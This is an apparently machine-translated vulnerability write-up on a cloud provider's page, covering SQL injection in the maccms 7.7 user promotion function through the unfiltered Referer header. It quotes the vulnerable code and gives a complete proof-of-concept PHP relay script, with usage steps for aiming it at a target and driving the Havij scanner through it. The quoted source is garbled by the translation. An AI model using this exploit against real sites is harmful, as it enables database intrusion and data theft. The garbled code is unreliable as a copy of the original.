This maccms test for the latest version 7.7 on the official website is somewhat different from the previous 6.x injection (the code is reconstructed and the protection script provided by 360 is used)
Combined with the old version of unclaimed injection, full version injection can be achieved
/User/index. php line: 615
Function tg () // promotion function. Let's talk about the previous 6. version x uses the English popularize, Which is changed to PinYin {global $ db; $ userid = be ("get", "uid"); $ userid = chkSql ($ userid, true); // completely uncontrollable if (! ChkGlobalCache ("tjlastdate") {setGlobalCache ("tjlastdate", date ('Y-m-d'), 0);} if (isNum ($ userid )) {$ ip = getIP (); // I used the 360 filter script $ ly = getReferer (); // I used the 360 filter script, see tracking $ row = $ db-> getRow ("select * from {pre} user where u_id = ". $ userid. ""); if ($ row) {// do not misunderstand here. You do not need to enter the injection after login, but enter a valid "promoter" id. It is absolutely feasible to enter 1, unless the entire website has no member $ SQL = "Select * From {pre} user_visit where uv_uid = ". $ userid. "and uv_ip = '". $ ip. "'And STR_TO_DATE (uv_time,' % Y-% m-% D') = '". date ("Y-m-d "). "'"; // exploit is not here. It is easy to control referer. $ row1 = $ db-> getRow ($ SQL); if (! $ Row1) {$ db-> Add ("{pre} user_visit", array ("uv_uid", "uv_ip", "uv_ly", "uv_time "), array ($ userid, $ ip, $ ly, date ("Y-m-d H: I: s"); // The ly variable enters the query, be careful that there will be a date later. You cannot forget it when constructing it later. // It has nothing to do with the following code $ db-> query ("update {pre} user set u_tj = u_tj + 1, u_points = u_points + ". app_popularize. "where u_id = ". $ userid); if (strpos (",". date ('Y-m-d H: I: s', time (), getGlobalCache ("tjlastdate") <= 0) {$ SQL = "delete from {pre} user_visit whereSTR_TO_DATE (uv_time, '% Y-% m-% D') <'". date ("Y-m-d "). "'"; $ db-> query ($ SQL); setGlobalCache ("tjlastdate", date ('Y-m-d'), 0 );}} unset ($ row1);} unset ($ row);} redirect (".. /");}
In comparison, the difference from 6.x is that the Code is restructured, and 360 also provides a filtering script, ......
/Inc/function. php line: 248
function getReferer(){ return $_SERVER["HTTP_REFERER"];}
360 of the filtering script cried, and there was no shot at all ......
Okay, after analyzing the principle, prove the hazard and continue to provide the poc.
In the referer, You need to construct the following date, so you can write your php transit request.
The principle is to forward requests and conveniently provide $ _ GET ["a"] to merge injection statements into referer.
As for date, I constructed now directly. See the following code.
Alkaid. php
<?phpfunction uc_fopen($url, $limit = 0, $post = '', $cookie = '', $bysocket = FALSE, $ip = '', $timeout = 15, $block = TRUE,$inject) {$return = '';$matches = parse_url($url);!isset($matches['host']) && $matches['host'] = '';!isset($matches['path']) && $matches['path'] = '';!isset($matches['query']) && $matches['query'] = '';!isset($matches['port']) && $matches['port'] = '';$host = $matches['host'];$path = $matches['path'] ? $matches['path'].($matches['query'] ? '?'.$matches['query'] : '') : '/';$port = !empty($matches['port']) ? $matches['port'] : 80;if($post) { $out = "POST $path HTTP/1.0\r\n"; $out .= "Accept: **\r\n"; //$out .= "Referer: $boardurl\r\n"; $out .= "Accept-Language: zh-cn\r\n"; $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n"; $out .= "Cookie: $cookie\r\n\r\n";}else { $out = "GET $path HTTP/1.0\r\n"; $out .= "Accept: */*\r\n"; $out .= "Referer: a',(select now()) and ".$inject.")#\r\n"; $out .= "Accept-Language: zh-cn\r\n"; $out .= "User-Agent: $_SERVER[HTTP_USER_AGENT]\r\n"; $out .= "Host: $host\r\n"; $out .= "Connection: Close\r\n"; $out .= "Cookie: $cookie\r\n\r\n";}$fp = @fsockopen(($ip ? $ip : $host), $port, $errno, $errstr, $timeout);if(!$fp) { return '';//note $errstr : $errno \r\n} else { stream_set_blocking($fp, $block); stream_set_timeout($fp, $timeout); @fwrite($fp, $out); $status = stream_get_meta_data($fp); if(!$status['timed_out']) { while (!feof($fp)) { if(($header = @fgets($fp)) && ($header == "\r\n" || $header == "\n")) { break; } } $stop = false; while(!feof($fp) && !$stop) { $data = fread($fp, ($limit == 0 || $limit > 8192 ? 8192 : $limit)); $return .= $data; if($limit) { $limit -= strlen($data); $stop = $limit <= 0; } } } @fclose($fp); return $return;}}uc_fopen('http://127.0.0.1/user/?action=tg&uid=1',0,0,0,FALSE,'',15,true,$_GET["a"]);echo 'hi';?>
Scan with Havij
Http: // 127.0.0.1/alkaid. php? A = 1% 3d1
The constructed referer will be sent to http: // 127.0.0.1/user /? Action = tg & uid = 1
Usage:
1. Set up alkaid. php locally
2. Modify the last few lines of alkaid. php and set http: // 127.0.0.1/user /? Change action = tg & uid = 1 to the corresponding test address. set uid to an existing user, and you do not need to log on to it.
3. Direct traffic to the local alkaid. php http: // 127.0.0.1/alkaid. php? A = 1% 3d1
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
